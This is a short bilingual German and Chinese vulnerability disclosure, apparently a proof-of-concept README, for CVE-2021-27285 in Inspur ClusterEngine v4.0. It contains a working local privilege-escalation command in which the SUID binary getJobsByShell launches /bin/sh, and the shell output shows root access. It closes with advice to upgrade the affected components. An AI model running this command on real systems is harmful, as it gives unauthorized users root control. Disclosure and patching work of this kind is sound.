
Proof-of-Concept-Exploit für die Inspur ClusterEngine SUID-Fehlkonfiguration (CVE-2021-27285), die Nicht-Admin-Benutzern die Privilegieneskalation auf root über die getJobsByShell-Komponente ermöglicht.
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。
浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。
提权过程如下:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
修复建议: 升级相关组件
Die Inspur ClusterEngine Cluster-Management-Plattform ist eine Job-Management-Software, die speziell für die Inspur TianSuo HPC-Produktreihe entwickelt wurde. Eine Fehlkonfiguration der SUID-Einstellungen in Inspur ClusterEngine ermöglicht es Nicht-Administrator-Benutzern, Privilegien zu erweitern und über bestimmte Komponenten Root-Zugriff zu erhalten.
Inspur ClusterEngine v4.0 weist eine fehlerhafte SUID-Konfiguration bei der Komponente "/opt/tsce4/torque6/bin/getJobsByShell" auf, die es Nicht-Administrator-Benutzern erlaubt, über den SUID-Mechanismus Privilegien zu erweitern und Root-Zugriff zu erlangen.
Der Privilegieneskalationsprozess ist wie folgt:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
Hinweis: Aktualisieren Sie die entsprechenden Komponenten.